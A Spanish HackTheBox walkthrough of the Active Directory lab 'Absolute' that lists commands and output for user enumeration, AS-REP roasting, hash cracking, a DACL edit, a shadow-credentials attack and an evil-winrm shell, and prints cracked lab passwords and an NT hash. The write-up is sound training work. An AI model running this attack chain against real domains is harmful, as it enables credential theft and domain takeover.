• Absolute is an Insane Windows Active Directory machine that starts with a webpage displaying some images, whose metadata is used to create a wordlist of possible usernames that may exist on the machine. It turns out that one of these users doesnt require Pre-authentication, therefore posing a valuable target for an ASREP roast attack. The discovered credentials are then used to enumerate LDAP and discover credentials for the user svc_smb, who has access to an SMB share containing a Windows binary. Performing dynamic analysis on the binary reveals that it tries to perform an LDAP connection to the Domain Controller with clear text credentials for the m.lovegod user, who owns the Network Audit group, which in turn has Generic Write over the winrm_user. Following this attack path and performing a shadow credential attack on the winrm_user, one can then WinRM and access the machine. Finally, the KrbRelay tool is used to add the winrm_user user to the Administrators group, leading to fully elevated privileges.


➜  nmap sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49684,49685,49697,49701 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 18:15 CST
Nmap scan report for
Host is up (0.11s latency).

53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Absolute
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-18 07:15:35Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
|_ssl-date: 2024-06-18T07:16:42+00:00; +7h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-18T07:16:42+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-18T07:16:42+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-18T07:16:42+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-06-18T07:16:36
|_  start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required


  • Estamos ante un entorno de Directorio Activo.
➜  nmap cme smb
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
  • Vamos agregar el nombre del dominio al /etc/hosts.
➜  nmap echo " absolute.htb dc.absolute.htb DC.absolute.htb" | sudo tee -a /etc/hosts absolute.htb dc.absolute.htb DC.absolute.htb
  • No podemos enumerar recursos compartidos por smb.
➜  nmap cme smb -u "miguelito" -p "" --shares
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB    445    DC               [-] absolute.htb\miguelito: STATUS_LOGON_FAILURE
➜  nmap smbmap -H --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
  File "/usr/bin/smbmap", line 33, in <module>
    sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
  File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
    host = [ host for host in share_drives_list.keys() ][0]
AttributeError: 'bool' object has no attribute 'keys'
^CYou pressed Ctrl+C!...
You pressed Ctrl+C!
➜  nmap smbclient -N -L //
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • Tampoco podemos enumerar por rpcclient.
➜  nmap rpcclient -N -U ""
rpcclient $> enumdomusers
  • Esta es la página web.

  • Estas son las tecnologías que están corriendo en la pagina web.
  nmap whatweb [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[], JQuery[3.3.1], Microsoft-IIS[10.0], Script, Title[Absolute]
  • Si hacemos fuzzing no encontramos anda interesante mas que la ruta images que al parecer son varias con el nombre de hero.
➜  content feroxbuster -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
 🎯  Target Url            │
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
 🏁  Press [ENTER] to use the Scan Management Menu™
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      150c =>
200      GET       33l       64w      782c
200      GET        6l       77w     3351c
200      GET      145l      442w     4030c
200      GET        5l      369w    21003c
200      GET        7l      689w    63240c
200      GET        7l      277w    44342c
200      GET        2l     1283w    86926c
301      GET        2l       10w      150c =>
200      GET     3625l     7946w    77906c
200      GET     4919l     8218w    79820c
200      GET        7l     2103w   160392c
403      GET       29l       92w     1233c
403      GET       29l       92w     1233c
403      GET       29l       92w     1233c
403      GET       29l       92w     1233c
301      GET        2l       10w      147c =>
200      GET      948l     7256w   690337c
200      GET     2425l    11064w   656123c
200      GET     1306l     7961w   733740c
200      GET        0l        0w  5501527c
200      GET        0l        0w  2085276c
200      GET        0l        0w  1834774c
  • Como tal las imágenes existen.

  • Son 6 imágenes en total así que vamos a descargarlas todas.
➜  content for i in {1..6}; do wget "${i}.jpg"; echo "Descargada la imagen hero_${i}.jpg"; done
  • Si inspeccionamos una foto con exiftool vemos que en el apartado de Author encontramos un nombre de usuario.
➜  content exiftool hero_1.jpg
ExifTool Version Number         : 12.76
File Name                       : hero_1.jpg
Directory                       : .
File Size                       : 407 kB
File Modification Date/Time     : 2022:06:07 14:45:20-05:00
File Access Date/Time           : 2024:06:18 12:12:39-06:00
File Inode Change Date/Time     : 2024:06:18 12:12:39-06:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Little-endian (Intel, II)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Artist                          : James Roberts
Y Cb Cr Positioning             : Centered
Quality                         : 60%
XMP Toolkit                     : Image::ExifTool 11.88
Author                          : James Roberts
Creator Tool                    : Adobe Photoshop CC 2018 Macintosh
Derived From Document ID        : 6413FD608B5C21D0939F910C0EFBBE44
Derived From Instance ID        : 6413FD608B5C21D0939F910C0EFBBE44
Document ID                     : xmp.did:887A47FA048811EA8574B646AF4FC464
Instance ID                     : xmp.iid:887A47F9048811EA8574B646AF4FC464
DCT Encode Version              : 100
APP14 Flags 0                   : [14], Encoded with Blend=1 downsampling
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 1900
Image Height                    : 1150
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1900x1150
Megapixels                      : 2.2
  • Como vemos un nombre de usuario los mas probable es que los demás usuarios también tengan un nombre de usuario en cada foto así que vamos a filtrar por ese campo para ver los nombres.
➜  content exiftool hero_*.jpg -Author
======== hero_1.jpg
Author                          : James Roberts
======== hero_2.jpg
Author                          : Michael Chaffrey
======== hero_3.jpg
Author                          : Donald Klay
======== hero_4.jpg
Author                          : Sarah Osvald
======== hero_5.jpg
Author                          : Jeffer Robinson
======== hero_6.jpg
Author                          : Nicole Smith
    6 image files read
  • Vamos hacer una lista con la estructura de los nombres de un Active Directory primero la letra mayúscula y después su nombre.
➜  content cat users.txt
  • Teniendo esta lista potencial de usuarios vamos a ver si son validos.
➜  content /opt/kerbrute_linux_amd64 userenum --dc dc.absolute.htb -d absolute.htb users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/18/24 - Ronnie Flathers @ropnop

2024/06/18 12:56:17 >  Using KDC(s):
2024/06/18 12:56:17 >  	dc.absolute.htb:88

2024/06/18 12:56:17 >  [+] VALID USERNAME:	 M.Chaffrey@absolute.htb
2024/06/18 12:56:17 >  [+] VALID USERNAME:	 S.Osvald@absolute.htb
2024/06/18 12:56:17 >  [+] VALID USERNAME:	 J.Roberts@absolute.htb
2024/06/18 12:56:17 >  [+] VALID USERNAME:	 N.Smith@absolute.htb
2024/06/18 12:56:17 >  [+] VALID USERNAME:	 J.Robinson@absolute.htb
2024/06/18 12:56:17 >  [+] VALID USERNAME:	 D.Klay@absolute.htb
2024/06/18 12:56:17 >  Done! Tested 6 usernames (6 valid) in 0.331 seconds
  • Ahora que sabemos que los usuario son validos podemos probar un ASREPRoast Attack.
➜  content impacket-GetNPUsers absolute.htb/ -no-pass -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.Chaffrey doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User S.Osvald doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Robinson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Smith doesn't have UF_DONT_REQUIRE_PREAUTH set
  • Tenemos el hash de D.Klay vamos a crackearlo para ver su contraseña.
➜  content john -w:/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Darkmoonsky248girl ($krb5asrep$23$D.Klay@ABSOLUTE.HTB)
1g 0:00:00:24 DONE (2024-06-18 13:00) 0.04149g/s 466323p/s 466323c/s 466323C/s DarrenCahppell..Danuelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
  • Tenemos credenciales.
➜  content echo "D.Klay:Darkmoonsky248girl" | sudo tee creds.txt
  • Vamos a sincronizarnos al reloj del dominio.
➜  content sudo ntpdate -s absolute.htb
➜  content cme smb -u 'D.Klay' -p 'Darkmoonsky248girl'
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB    445    DC               [-] absolute.htb\D.Klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION
  • Si nos autenticamos con el protocolo de kerberos nos dicen que si son correctas.

➜  content cme smb -u 'D.Klay' -p 'Darkmoonsky248girl' -k
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB    445    DC               [+] absolute.htb\D.Klay:Darkmoonsky248girl


  • Como por kerberos las credenciales son correctas podemos enumerar por el protocolo smb recursos compartidos.
➜  content crackmapexec smb -u 'D.Klay' -p 'Darkmoonsky248girl' -k --shares
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB    445    DC               [+] absolute.htb\D.Klay:Darkmoonsky248girl
SMB    445    DC               [+] Enumerated shares
SMB    445    DC               Share           Permissions     Remark
SMB    445    DC               -----           -----------     ------
SMB    445    DC               ADMIN$                          Remote Admin
SMB    445    DC               C$                              Default share
SMB    445    DC               IPC$            READ            Remote IPC
SMB    445    DC               NETLOGON        READ            Logon server share
SMB    445    DC               Shared
SMB    445    DC               SYSVOL          READ            Logon server share
  • Bueno no hay nada interesante algo que podemos hacer es usar el protocolo ldap para enumerar usuarios del dominio mediante al autenticación de kerberos.
➜  content crackmapexec ldap -u 'D.Klay' -p 'Darkmoonsky248girl' -k --users
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP    389    DC               [+] absolute.htb\D.Klay:Darkmoonsky248girl
LDAP    389    DC               [*] Total of records returned 20
LDAP    389    DC               Administrator                  Built-in account for administering the computer/domain
LDAP    389    DC               Guest                          Built-in account for guest access to the computer/domain
LDAP    389    DC               krbtgt                         Key Distribution Center Service Account
LDAP    389    DC               J.Roberts
LDAP    389    DC               M.Chaffrey
LDAP    389    DC               D.Klay
LDAP    389    DC               s.osvald
LDAP    389    DC               j.robinson
LDAP    389    DC               n.smith
LDAP    389    DC               m.lovegod
LDAP    389    DC               l.moore
LDAP    389    DC               c.colt
LDAP    389    DC               s.johnson
LDAP    389    DC               d.lemm
LDAP    389    DC               svc_smb                        AbsoluteSMBService123!
LDAP    389    DC               svc_audit
LDAP    389    DC               winrm_user                     Used to perform simple network tasks
  • Tenemos nuevas credenciales.
  • Si las revisamos vemos que son correctas usando el protocolo de kerberos.
➜  content crackmapexec smb -u 'svc_smb' -p 'AbsoluteSMBService123!' -k
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB    445    DC               [+] absolute.htb\svc_smb:AbsoluteSMBService123!


  • Podemos volver a listar recursos compartidos por el protocoló smb.
➜  content crackmapexec smb -u 'svc_smb' -p 'AbsoluteSMBService123!' -k --shares
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB    445    DC               [+] absolute.htb\svc_smb:AbsoluteSMBService123!
SMB    445    DC               [+] Enumerated shares
SMB    445    DC               Share           Permissions     Remark
SMB    445    DC               -----           -----------     ------
SMB    445    DC               ADMIN$                          Remote Admin
SMB    445    DC               C$                              Default share
SMB    445    DC               IPC$            READ            Remote IPC
SMB    445    DC               NETLOGON        READ            Logon server share
SMB    445    DC               Shared          READ
SMB    445    DC               SYSVOL          READ            Logon server share
  • Vamos a conectarnos para ver que hay dentro de shared.
➜  content impacket-smbclient -k absolute.htb/svc_smb:'AbsoluteSMBService123!'@dc.absolute.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
Type help for list of commands
# use Shared
# ls
drw-rw-rw-          0  Thu Sep  1 12:02:23 2022 .
drw-rw-rw-          0  Thu Sep  1 12:02:23 2022 ..
-rw-rw-rw-         72  Thu Sep  1 12:02:23 2022 compiler.sh
-rw-rw-rw-      67584  Thu Sep  1 12:02:23 2022 test.exe
  • Vamos a descargar los 2 archivos.
# mget *
[*] Downloading compiler.sh
[*] Downloading test.exe
  • Tenemos un ejecutable y un script en bash.
➜  content file test.exe
test.exe: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 11 sections
➜  content cat compiler.sh

nim c -d:mingw --app:gui --cc:gcc -d:danger -d:strip $1
  • Vamos agregar al /etc/hosts la IP y dominios de la máquina victima.

  • Vamos correr la VPN de HackTheBox en la máquina Windows.

  • Ahora vamos a pasar el .exe a la máquina Windows.

  • Como no sabemos que hace el .exe vamos a ponernos a interceptar el trafico con Wireshark.

  • Al momento de ejecutar el binario y estar capturando con Wireshark encontramos credenciales.

  • Nos dice que no son correctas.
➜  content crackmapexec smb -u 'mlovegod' -p 'AbsoluteLDAP2022!' -k
SMB    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB    445    DC               [-] absolute.htb\mlovegod: KDC_ERR_C_PRINCIPAL_UNKNOWN
  • Si les ponemos un punto funciona.
➜  content crackmapexec smb absolute.htb -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k
SMB         absolute.htb    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         absolute.htb    445    DC               [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!
  • Para enumerar el DC vamos a usar bloodhound.
➜  content bloodhound-python -u m.lovegod -p AbsoluteLDAP2022! -k -c All -d absolute.htb -dc dc.absolute.htb -ns --zip
INFO: Found AD domain: absolute.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.absolute.htb
INFO: Done in 00M 23S
INFO: Compressing output into 20240618211316_bloodhound.zip
➜  ~ sudo neo4j start
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:39754). It is available at http://localhost:7474
There may be a short delay until the server is ready.

➜  ~ bloodhound &> /dev/null & disown
  • Vamos a marcar los usuarios que ya tenemos comprometidos.

  • Si vamos a Shortest Paths y seleccionamos el usuario m.lovegod encontramos una forma de convertirnos en el usuario winrm_user.

  • m.lovegod tiene el privilegio owns en el grupo GenericWrite.

El privilegio “Owns” dentro del grupo “GenericWrite” le otorga al usuario la capacidad de modificar la mayoría de los atributos del objeto, administrar el objeto y delegar permisos a otros usuarios, con ciertas excepciones.

  • El usuario el cual es nuestro objetivo es parte del grupo Remote Management Users.

m.lovegod to Network Audit

  • Estuve muchas horas tratando de solucionar los errores para empezar tuve que hacer los mismos pasos 3 veces para llegar a obtener el hash NT de winrm_user pero esto fue lo que hice.
➜  content cat /etc/resolv.conf
# Generated by NetworkManager
➜  content cat /usr/share/samba/setup/krb5.conf
	default_realm = ABSOLUTE.HTB
	dns_lookup_realm = false
	dns_lookup_kdc = true

		kdc = dc.absolute.htb
		admin_server = dc.absolute.htb
		default_domain = absolute.htb


➜  content python3 dacledit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] DACL backed up to dacledit-20240619-000424.bak
[*] DACL modified successfully!
  • Ahora agregamos el usuario.
➜  content net rpc group addmem "Network Audit" m.lovegod -U 'absolute.htb/m.lovegod%AbsoluteLDAP2022!' -S dc.absolute.htb --use-kerberos=required
  • Comprobamos que el usuario esta en el grupo.
➜  content net rpc group members "Network Audit" -U 'absolute.htb/m.lovegod%AbsoluteLDAP2022!' -S dc.absolute.htb --use-kerberos=required
  • Ahora vamos a generar un TGT y lo exportamos como variable para después autenticarnos.
➜  content impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in m.lovegod.ccache
➜  content export KRB5CCNAME=m.lovegod.ccache
  • En este punto deberíamos de tener GenericWrite en el usuario winrm_user podemos usar certipy para obtener el TGT del usuario https://github.com/ly4k/Certipy.
➜  content certipy-ad shadow auto -u absolute.htb/m.lovegod@dc.absolute.htb -k -no-pass -target dc.absolute.htb -account winrm_user
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '57b7f097-a9b3-ed02-6197-427cafe8b77b'
[*] Adding Key Credential with device ID '57b7f097-a9b3-ed02-6197-427cafe8b77b' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '57b7f097-a9b3-ed02-6197-427cafe8b77b' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2


  • Ahora nos conectamos.
➜  content export KRB5CCNAME=winrm_user.ccache
➜  content evil-winrm -i dc.absolute.htb -r absolute.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_user\Documents>

User flag

  • Podemos leer la flag.
*Evil-WinRM* PS C:\Users\winrm_user\Desktop> type user.txt

Privilege Escalation

malloc_consolidate(): unaligned fastbin chunk detected
[1]    109301 IOT instruction  evil-winrm -i dc.absolute.htb -r absolute.htb
*Evil-WinRM* PS C:\Users\winrm_user\Documents> upload /home/miguel/Hackthebox/Gatogamer_account/Absolute/content/winPEASx64.exe

Info: Uploading /home/miguel/Hackthebox/Absolute/content/winPEASx64.exe to C:\Users\winrm_user\Documents\winPEASx64.exe

Data: 3183272 bytes of 3183272 bytes copied

Info: Upload successful!

Ultima parte

Como la máquina me esta dando demasiados errores la escalada de privilegios que consiste en hacer un KrbRelay la pueden encuntrar en el post de mi compañero https://xchg2pwn.github.io/hackthebox/absolute/